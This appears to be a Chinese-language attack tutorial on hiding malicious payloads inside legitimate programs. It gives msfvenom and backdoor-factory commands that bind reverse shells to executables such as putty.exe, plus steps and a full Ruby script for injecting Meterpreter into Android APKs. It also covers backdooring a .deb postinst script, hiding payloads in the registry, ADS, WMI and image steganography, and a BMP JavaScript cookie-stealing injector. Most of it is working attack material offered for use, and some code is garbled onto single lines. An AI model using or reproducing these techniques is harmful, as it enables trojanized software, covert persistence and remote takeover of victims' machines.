常见捆绑注入payload手法

Payload捆绑注入

注入exe型+编码：
msfvenom -a <arch>  --plateform <platform>  -p <payload> <payload options>  -e <encoder option> -i <encoder times> -x <template> -k <keep> -f <format> -o <path>拼接型：
msfvenom -a <arch>  --platform <platform>   -p <payload> -c <shellcode>  <payload options>  -e <encoder option> -i <encoder times> -f <format> -o <path>

msfvenom -a x86 --platform windows  -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_nai -f exe > testtmp.exe

-p参数可以接收自定义载荷
cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw

backdoor-factory

在指定程序中注入payload
backdoor-factory -f Test.exe -S 　　　　　　　　　　　　　　　　　　#检测是否支持注入
backdoor-factory -f Test.exe -s show 　　　　　　　　　　　　　　　　 #查看注入payload所需参数
backdoor-factory -f Test.exe -s .... -H <host> -P <Port> -a
backdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D　　#自动搜索应用程序(-i)并注入反弹payload(-a),并删除原文件(-D)
-u .moocowwow #-u参数则代表把原文件改为指定拓展名的文件

User supplied shellcode

msfvenom -p windows/exec CMD='calc.exe' R >calc.bin
backdoor.py-f psexec.exe -s user_supplied_shellcode -U calc.bin

veil-evasion

>native/backdoor_factory>set LHOST .....>set LPORT>set orig_exe /path/要注入的后门程序>info查看信息>generate 生成payload
设置名字时不要加拓展名

shellter

基本使用不再介绍，这里介绍下加载自定义payload

如使用msf先生成payload：

msf > use payload/windows/meterpreter/reverse_http
msf payload(reverse_http) > show options
msf payload(reverse_http) > set lhost xxx
msf payload(reverse_http) > set exitfunc thread
msf payload(reverse_http) > generate -E -e x86/shikata_ga_nai -t raw -f shellcode.raw

或者

msfvenom -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -i 8 -b '\x00' LHOST=xxx LPORT=xx  -f raw -o shellcode.raw

然后使用shellter时Select Payload的时候选择刚刚的生成的shellcode.raw。

APK payload捆绑

(1)ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk
(2)d2j-apk-sign 文件名　　　　　//重新对生成的APK文件签名(d2j-apk-sign kali自带)

其他脚本apk_binder_script.py，apk-embed-payload.rb，slpade，backdoor-apk等

APK 逆向方式手工捆绑

(1)msfvenom -p ..... payload.apk
(2)apktool d /path/payload.apk
　 apktool d /path/Normal_File.apk
　 把逆向payload中的smail/com中的文件夹复制到正常文件逆向后的smail/com文件夹中
(3)在正常逆向的apk文件中的AndroidManifest.xml搜索' LAUNCHER'
　　　　如android:targetActive="com.facebook.nodex.startup.splashscreen.NodexSplashActivity">
　　　　targetActive :程序开始的地方，根据此路径找到NodexSplashActivity.smali文件;
(4)在该文件中搜索'onCreate':
　　　　invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity;
　　　　->onCreate(Landroid/os/Bundle;)V
　　在该语句下方添加一条执行payload的语句：
　　invoke-static {p0},Lcom/metaspolit/stage/Payload;->start(Landroid/content/Context;)V
(5)把payload AndroidManifest.xml 中 <user-permission abdroid:name="....">语句添加到正常APK对应位置
(6)重新编译APK文件: apktool b /Normal/
(7)d2j-apk-sign 文件名 #重新签名

deb安装包中添加后门程序

(1)dpkg -x xx.deb xxx 　　　　　　　　　　#把xx.deb解包到xxx文件夹
(2)在xxx目录新建DEBIAN（必须大写）文件夹
(3)touch control postinst 　　　　　　　 #在DEBIAN文件夹新建control和postinst文件
(4)nano control 　　　　　　　　　　　　　 #写入软件包的信息，比较重要，如果有错误可能导致无法安装，所以建议直接复制原软件包中 control文件所有内容
(5)复制后门程序到解包文件夹下 /usr/bin 目录里
(6)vi postinst 　　　　　　　　　　　　　　#这个是安装软件是执行的脚本，这个也是我们后门程序运行的关键，内容可参考如下：

#！/bin/sh
sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor & #执行后门程序，如这里backdoor
sudo /usr/bin/xxx -V #安装后显示软件版本信息，这里参数可能不太一样，也可以自定义执行的参数

(7)chmod 555 postinst #postinst的执行权限为>=555且=<775
(8)dpkg-deb --build xxx/ xxx.deb #检查一遍没有问题就可以打包了

本机开始监听，软件发送到目标客户端执行。。。

windows下也有很多小工具可以实现

如“邪恶后门添加工具”

将“邪恶后门添加工具”文件夹下的xiya.dll文件复制到正常程序所在的文件夹下，接下来在“后门地址”栏中输入刚才上传的病毒木马的链接地址

最后点击“添加后面”按钮，病毒木马的链接地址就会被添加到正规软件里面了。

这样当运行这个带有“后门”的软件时，软件就会在系统后台下载并运行设置的病毒木马程序了。

payload隐藏的相关技巧

0x00 目标：维持对目标主机的控制权限
0x01 要求：尽最大程度减少在目标windows主机留下文件，降低被发现被捕获样本的概率
0x02 方法：1、伪造文件后缀名：使用不常见的后缀名，藏于系统的某个角落
分析：最简单直接的办法，但被发现的概率也最大2、插入正常文件
将payload保存到系统正常文件的中间或者尾部
分析：比方法1高级一些，复杂度+1，没有单独生成文件，隐蔽性+23、藏于注册表
将payload加密存于注册表
分析：易被监控，隐蔽性-1，但poweliks的运用使该项技术创新性+2
poweliks简介：2014年8月左右出现，XCon2015《应用层持久化攻击技术》也对此做了介绍
特点：将payload保存为非ASCII字符，无法被注册表正常读取
运行代码方式：
（1）直接执行jscript： rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');
（2）读取注册表payload并执行： HKCU\\software\\microsoft\\windows\\currentversion\\run\\
读取并执行： rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
补充：一个加密jscript的网站：http://tool.lu/js/4、ADS (供选数据流/ alternate data stream)
将payload存入正常文件的ADS中
分析：适用于长度较小的payload，常用来执行vbs、Powershell脚本，效率+1，实现难度-1
常用命令：
列出文件ADS： dir /r test.txt
写入ADS： type nc.exe > test.txt:nc.exe
触发器：该触发器是一段VB脚本，会打开一个cmd运行test.txt:1 里的脚本
echo Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):command = "cmd /C for /f ""delims=,"" %i in
(C:\\test\\test.txt:1) do %i":objShell.Run command, 0:Set objShell = Nothing > test.txt:run.vbs5、wmibackdoor
将payload存入WMI Class中，详情见drops链接：http://drops.wooyun.org/tips/8260
分析：该方法目前普及不高，检测方法也很单一，所以payload放在这里隐蔽性+36、Steganography
隐写术，将payload存到图片中，甚至可以伪造windows中的默认图片
分析：隐写术由来已久，但门槛很高，复杂度+1，因此检测成本也很高，隐蔽性+3

　

拓展名伪装：

一些容易被忽视的可执行拓展名：

.scr：屏幕保护程序的文件类型。

.pif：“Shortcut to MS-DOS Program”文件。默认隐藏，即使用户禁用隐藏默认文件名，也是默认不显示“.pif”后缀的　

相关文章

http://www.tuicool.com/articles/qINzyum　　PNG文件中的LSB隐写

https://zhuanlan.zhihu.com/p/24054040　　利用JPEG文件格式隐藏payload

https://zhuanlan.zhihu.com/p/23890809　　利用PNG文件格式隐藏Payload

BMP-JS-inject

#!/usr/bin/env python2.7
#coding:utf-8
"""
eg: python BMPinjector.py -i 1.bmp "alert(document.cookie);"
参考：http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html也可以采用js混淆来绕过检查,得到和上面一样的效果
python BMPinjector.py [-i] 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"
注意：\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65对应document.cookie演示页面run.html
<html>
<head><title>Opening an image</title></head>
<body>
<img src="1.bmp"\>
<script src="1.bmp"></script>
</body>
</html>
"""
import os
import argparsedef injectFile(payload,fname):f = open(fname,"r+b")b = f.read()f.close()f = open(fname,"w+b")f.write(b)f.seek(2,0)f.write(b'\x2F\x2A')f.close()f = open(fname,"a+b")f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')f.write(payload)f.close()return Trueif __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument("filename",help="the bmp file name to infected")parser.add_argument("js_payload",help="the payload to be injected. For exampe: \"alert(1);\" ")args = parser.parse_args()injectFile(args.js_payload,args.filename)

　　

ruby apk-embed-payload.rb

#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on http://vinayakwadhwa.in/apk-embed-payload.rb
# arbitrary APKs.
# Authored by timwr, Jack64
# Redistributed by PFSFXrequire 'nokogiri'
require 'fileutils'
require 'optparse'# Find the activity thatapk_backdoor.rb  is opened when you click the app icon
def findlauncheractivity(amanifest)package = amanifest.xpath("//manifest").first['package']activities = amanifest.xpath("//activity|//activity-alias")for activity in activitiesactivityname = activity.attribute("name")category = activity.search('category')unless categorynextendfor cat in categorycategoryname = cat.attribute('name')if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')activityname = activityname.to_sunless activityname.start_with?(package)activityname = package + activitynameendreturn activitynameendendend
end# If XML parsing of the manifest fails, recursively search
# the smali code for the onCreate() hook and let the user
# pick the injection point
def scrapeFilesForLauncherActivity()smali_files||=[]Dir.glob('original/smali*/**/*.smali') do |file|checkFile=File.read(file)if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")smali_files << filesmalifile = fileactivitysmali = checkFileendendi=0print "[*] Please choose from one of the following:\n"smali_files.each{|s_file|print "[+] Hook point ",i,": ",s_file,"\n"i+=1}hook=-1while (hook < 0 || hook>i)print "\nHook: "hook = STDIN.gets.chomp.to_iendi=0smalifile=""activitysmali=""smali_files.each{|s_file|if (i==hook)checkFile=File.read(s_file)smalifile=s_fileactivitysmali = checkFilebreakendi+=1}return [smalifile,activitysmali]
enddef fix_manifest()payload_permissions=[]#Load payload's permissionsFile.open("payload/AndroidManifest.xml","r"){|file|k=File.read(file)payload_manifest=Nokogiri::XML(k)permissions = payload_manifest.xpath("//manifest/uses-permission")for permission in permissionsname=permission.attribute("name")payload_permissions << name.to_send#   print "#{k}"}original_permissions=[]apk_mani=''#Load original apk's permissionsFile.open("original/AndroidManifest.xml","r"){|file2|k=File.read(file2)apk_mani=koriginal_manifest=Nokogiri::XML(k)permissions = original_manifest.xpath("//manifest/uses-permission")for permission in permissionsname=permission.attribute("name")original_permissions << name.to_send#   print "#{k}"}#Get permissions that are not in original APKadd_permissions=[]for permission in payload_permissionsif !(original_permissions.include? permission)print "[*] Adding #{permission}\n"add_permissions << permissionendendinject=0new_mani=""#Inject permissions in original APK's manifestfor line in apk_mani.split("\n")if (line.include? "uses-permission" and inject==0)for permission in add_permissionsnew_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"endnew_mani << line+"\n"inject=1elsenew_mani << line+"\n"endendFile.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
endapkfile = ARGV[0]
unless(apkfile && File.readable?(apkfile))puts "Usage: #{$0} [target.apk] [msfvenom options]\n"puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"exit(1)
endjarsigner = `which jarsigner`
unless(jarsigner && jarsigner.length > 0)puts "No jarsigner"exit(1)
endapktool = `which apktool`
unless(apktool && apktool.length > 0)puts "No apktool"exit(1)
endapk_v=`apktool`
unless(apk_v.split()[1].include?("v2."))puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"exit(1)
endbeginmsfvenom_opts = ARGV[1,ARGV.length]opts=""msfvenom_opts.each{|x|opts+=xopts+=" "}
rescueputs "Usage: #{$0} [target.apk] [msfvenom options]\n"puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"puts "[-] Error parsing msfvenom options. Exiting.\n"exit(1)
endprint "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
if res.downcase.include?("invalid" || "error")puts resexit(1)
endprint "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey``rm -rf original`
`rm -rf payload``cp #{apkfile} original.apk`print "[*] Decompiling orignal APK..\n"
`apktool d $(pwd)/original.apk -o $(pwd)/original`
print "[*] Decompiling payload APK..\n"
`apktool d $(pwd)/payload.apk -o $(pwd)/payload`f = File.open("original/AndroidManifest.xml")
amanifest = Nokogiri::XML(f)
f.closeprint "[*] Locating onCreate() hook..\n"launcheractivity = findlauncheractivity(amanifest)
smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
beginactivitysmali = File.read(smalifile)
rescue Errno::ENOENTprint "[!] Unable to find correct hook automatically\n"beginresults=scrapeFilesForLauncherActivity()smalifile=results[0]activitysmali=results[1]rescueputs "[-] Error finding launcher activity. Exiting"exit(1)end
endprint "[*] Copying payload files..\n"
FileUtils.mkdir_p('original/smali/com/metasploit/stage/')
FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/'
activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..\n"
File.open(smalifile, "w") {|file| file.puts hookedsmali }
injected_apk=apkfile.split(".")[0]
injected_apk+="_backdoored.apk"print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`puts "[+] Infected file #{injected_apk} ready.\n"

png图片中插入payload

#!/usr/bin/env pthon
#--*--coding=utf-8--*--
#http://bobao.360.cn/learning/detail/3274.html
# python encode.py image.png image_out.png payload.datfrom PIL import Image
from sys import argv
from base64 import b64encodei = argv[1]
o = argv[2]
with open(argv[3], 'rb') as f:text = f.read()img_in = Image.open(i)
img_pad = img_in.size[0] * img_in.size[1]
text = b64encode(text)
if len(text) < img_pad:text = text + '\x00'*(img_pad - len(text))
else:print('File is too large to embed into the image.')quit()
text = [text[i:i+img_in.size[1]] for i in range(0, len(text), img_in.size[1])]img_size = img_in.size
img_mode = img_in.mode
img_o = Image.new(img_mode, img_size)for ih, tblock in zip(xrange(img_in.size[0]), text):for iv, an in zip(xrange(img_in.size[1]), [ord(x) for x in tblock]):x, y, z, a = img_in.getpixel((ih, iv))pixels = (x, y, z, an)img_o.putpixel((ih, iv), pixels)img_o.save(o)

　　

相关链接

　　http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

　　http://xiao106347.blog.163.com/blog/static/215992078201401223746744/